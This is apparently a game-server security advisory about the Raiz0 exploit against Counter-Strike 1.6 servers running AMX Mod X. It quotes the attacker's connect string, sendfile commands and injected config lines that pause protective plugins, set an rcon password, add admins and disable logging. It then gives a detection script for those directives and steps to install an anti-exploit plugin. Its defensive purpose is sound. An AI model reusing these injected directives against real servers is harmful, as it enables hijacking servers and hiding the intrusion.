The Raiz0 exploit creates files with the .cfg extension and writes various lines into them. These lines overwrite certain server settings: for example, they change the rcon password and disable the plugins that prevent a number of other exploits.
To do this it uses the writefile module, for example:
COM_WriteFile : addons/amxmodx/configs/maps/de_nuke_rarea.cfg
Ignoring non-customization file upload of addons\amxmodx\configs\maps\de_nuke_rarea.cfg
How this exploit works:
The attacker connects to the server with:
….connect 48 1899560584
"\prot\3\unique\-1\raw\steam\cdkey\85f1731996f9844694d90d4aa89ad373"
"\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\0\cl_lc\1\cl_lw\1\cl_updaterate\20\model\arctic\name\Alex\team\topcolor\topcolor\30\_dr\raiz0\_laleagane\raiz0\_anzo\raiz0\_hns\raiz0\translit\1\_pw\test\_gm\0630\lang\pl\autobind\v1.0\rate\20000"
...and will execute the config:
sendfile "addons\amxmodx\configs\exec.cfg"
sendfile "maps.cfg"
sendfile "addons\amxmodx\configs\maps\de_dust.cfg"
sendfile "addons\amxmodx\configs\maps\de_nuke.cfg"
sendfile "addons\amxmodx\configs\maps\de_train.cfg"
sendfile "addons\amxmodx\configs\maps\de_kabul.cfg"
sendfile "addons\amxmodx\configs\maps\de_tuscan.cfg"
sendfile "addons\amxmodx\configs\maps\de_cbble.cfg"
sendfile "addons\amxmodx\configs\maps\de_inferno.cfg"
sendfile "addons\amxmodx\configs\maps\de_dust2.cfg"
sendfile "addons\amxmodx\configs\maps\de_aztec.cfg"
sendfile "addons\amxmodx\configs\exec.cfg"
sendfile "addons\metamod\exec.cfg"
sendfile "addons\amxmodx\configs\maps\de_cpl_strike.cfg"
sendfile "addons\amxmodx\configs\maps\de_cpl_strike.cfg"
After that it creates the following files (example):
cs/cstrike/addons/amxmodx/configs/maps/de_italy.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_mjolby6.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_c00l_f.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_long.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_tuscan.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_vertigo.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_westwood.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train_32.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_havana.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_perfect_inferno.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_zima.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_amr.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_kabul32.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty_b2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dinaunion.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_arctic.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2x2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_eldorado.cfg
cs/cstrike/addons/amxmodx/configs/maps/as_oilrig.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty.cfgl
cs/cstrike/addons/amxmodx/configs/maps/deathrun_projetocs2.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_lapp.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_romania.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_alexandra.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_epixi.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_cbble.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_mie.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty2k_b2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust4ever.cfg
cs/cstrike/addons/amxmodx/configs/maps/codex_knife.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_inferno2se.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke32.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_india.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_choklad.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_abaddon.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_kolor_v2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_inferno.cfg
cs/cstrike/addons/amxmodx/configs/maps/35hp_alone.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_helvis.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_siege.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_dixor.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dustyaztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainbow2k.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_bycastor32.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_zigzag.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_purplez.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_projetocs.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust4.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_backalley.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_2006.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train32.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_prodigy.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_italy.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_unreal.cfg
cs/cstrike/addons/amxmodx/configs/maps/css_dust2.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_bhopz_v2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust2_2x2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_cpl_mill_32.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_westwood_big.cfg
cs/cstrike/addons/amxmodx/configs/maps/35hp.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dustvsaztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_ghosts.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainrun.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_rainbow.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke.cfg
cs/cstrike/addons/amxmodx/configs/maps/hnsm_nemesis.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_chateau.cfg
cs/cstrike/addons/amxmodx/configs/maps/31hp_knife_pro.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_airstrip.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_militia.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_piranesi.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_aztec.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_bhopz.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_assault.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_industro.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_rooftops.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_estate.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_kitty_b1.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_aztec2.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_dust.cfg
cs/cstrike/addons/amxmodx/configs/maps/cs_assault_hotel.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_nuke_rarea.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_lime.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_train.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_mjolby3.cfg
cs/cstrike/addons/amxmodx/configs/maps/deathrun_3h.cfg
cs/cstrike/addons/amxmodx/configs/maps/awp_rooft0ps_remake.cfg
cs/cstrike/addons/amxmodx/configs/maps/de_kabul.cfg
cs/cstrike/addons/amxmodx/configs/maps/c21_love.cfg
cs/cstrike/addons/metamod/exec.cfg
These files contain settings such as:
amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause krond.amxx
amxx pause function
amx_addadmin "STEAM_0:0:37841280" "abcdefghijklmnopqrstu"
rcon_password "asd123"
amx_addadmin "HLTV" "abcdefghijklmnopqrstu"
amx_addadmin "STEAM_0:0:1337" "abcdefghijklmnopqrstu"
amx_addadmin "Owner" "" "abcdefghijklmnopqrstu" "a"
motdfile motd.txt
log off
mp_logfile 0
In this way it changes the rcon password, gains administrator access and can manipulate your server.
rcon 1899560584 "198709871234l0l" say Server hacked by raiz0
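A check an administrator can run against the per-map configs and the server log, as an added example that is not part of the original post or of the anti-exploit package: it flags the directive types listed above (plugin pauses, rcon password changes, added admins, disabled logging) and extracts .cfg paths under addons/ reported by COM_WriteFile. The function names and the sample input are constructed for illustration.

```python
import re

# Directive patterns taken from the injected settings listed above.
SUSPICIOUS = [
    ("plugin paused", re.compile(r"^\s*amxx\s+pause\b", re.I)),
    ("rcon password set", re.compile(r"^\s*rcon_password\b", re.I)),
    ("admin added", re.compile(r"^\s*amx_addadmin\b", re.I)),
    ("logging disabled", re.compile(r"^\s*(log\s+off|mp_logfile\s+0)\s*$", re.I)),
]
# Engine log line format quoted on the page: "COM_WriteFile : <path>"
WRITEFILE = re.compile(r"^COM_WriteFile\s*:\s*(\S+)")


def audit_cfg(text):
    """Return (line_number, reason, line) for each suspicious directive."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for reason, pattern in SUSPICIOUS:
            if pattern.search(line):
                findings.append((number, reason, line.strip()))
                break
    return findings


def written_configs(log_lines):
    """Return lowercased .cfg paths under addons/ that the log reports as written."""
    paths = []
    for line in log_lines:
        match = WRITEFILE.match(line.strip())
        path = match.group(1).replace("\\", "/").lower() if match else ""
        if path.startswith("addons/") and path.endswith(".cfg"):
            paths.append(path)
    return paths


# Constructed sample input, modelled on the lines quoted above.
SAMPLE_CFG = """mp_timelimit 30
amxx pause rcon_defencer.amxx
rcon_password "asd123"
amx_addadmin "HLTV" "abcdefghijklmnopqrstu"
log off
mp_logfile 0
"""
SAMPLE_LOG = [
    "COM_WriteFile : addons/amxmodx/configs/maps/de_nuke_rarea.cfg",
    "COM_WriteFile : logos/custom.wad",
]
if __name__ == "__main__":
    print(audit_cfg(SAMPLE_CFG), written_configs(SAMPLE_LOG))
```

Run audit_cfg over the files in addons/amxmodx/configs/maps and addons/metamod/exec.cfg only; server.cfg sets rcon_password legitimately and would be flagged.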
Preventing an attack with this exploit.
* INFO: this plugin requires the module: Orpheu v2.6.3 http://mortall.ro/viewtopic.php?f=46&t=204&p=221#p221
1. ANTI-EXPLOIT
Download the attached archive anti-raiz0-exploit.rar and extract it. www.mortall.ro/download/anti-raiz0-exploit.rar
2. INSTALLATION
Add the files:
- engine_i686.so
- file_exploit.cfg
and the folder:
- addons
to the cstrike directory.
In the server.cfg file add the text: exec file_exploit.cfg
Open the plugins.ini file (../cstrike/addons/amxmodx/configs/plugins.ini) and add the text: File_exploit_rcon_hack.amxx
Save and close the file.
> UPDATE Dproto to the latest version: http://mortall.ro/viewtopic.php?f=45&t=149
* Restart the server
Open the rcon console and type meta list to check whether the Orpheu module has loaded:
- Orpheu RUN - orpheu_amxx_i386 v2.3